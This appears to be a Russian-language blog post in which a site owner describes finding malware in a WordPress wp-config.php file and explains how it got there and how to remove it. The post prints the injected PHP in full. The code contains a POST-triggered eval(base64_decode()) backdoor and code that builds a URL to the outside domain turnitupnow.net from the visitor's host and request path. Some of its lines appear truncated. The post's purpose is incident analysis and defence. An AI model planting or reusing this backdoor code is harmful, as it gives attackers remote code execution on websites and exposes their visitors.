Вы один прекрасный день я обнаружил что мой сайт не хочет открывать и выдает что меня вирус. В рапорте от гугл-хрома фигурировал домен: turnitupnow.net . Выкачав на локальный комп( мой сверх секурный хостинг дает SSH по запросу — но запрос мне так удобнее не канает =) ) сайт я проискал по строке “turnitupnow.net ” и она оказалась всего в одном файле: wp-config.php. Собственно сам “вирь” представлял из себя примерно такой php код:
global $sessdt_o;
if(!$sessdt_o) {
$sessdt_o = 1;
$sessdt_k = "lb11";
if(!@$_COOKIE[$sessdt_k]) {
$sessdt_f = "102";
if(!@headers_sent()) {
@setcookie($sessdt_k,$sessdt_f);
} else {
echo "";
}
} else {
if($_COOKIE[$sessdt_k]=="102") {
$sessdt_f = (rand(1000,9000)+1);
if(!@headers_sent()) {
@setcookie($sessdt_k,$sessdt_f);
} else {
echo "";
}
$sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"];
$sessdt_v = urlencode(strrev($sessdt_j));
$sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200);
echo "";
echo " }
} $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
exit;
}
}
Нечего выдающегося. Просто внедряет вредоносный код с другого сайта. При такой атаки главное чтоб “хранилище вредоносного кода” выдержало нагрузку.
Судя по всему атака происходила по следующему сценарию:
1. Был взят или куплен хостинг на сервер где находится и мои сайты. Дальше его ковыряли и выясняли настройки. Выяснили структуру папок для типичного хоста.
2. Ищем хорошо известные файлы часто используемых CMS и проверяем права доступа к ним.
3. Найденые файлы с правами на запись для всех — заражаем.
Лечиться эта зараза удаление из wp-config.php кода — это просто он находиться в начале файла удалить надо все после
Вывод и всего — этого ставьте нормальные права на файлы — а то в один прекрасный день в них могут записать вирус. А вообще наблюдается недостаточное изолирование клиентов на шаред хостинге друг от друга - надо менять хостинг.
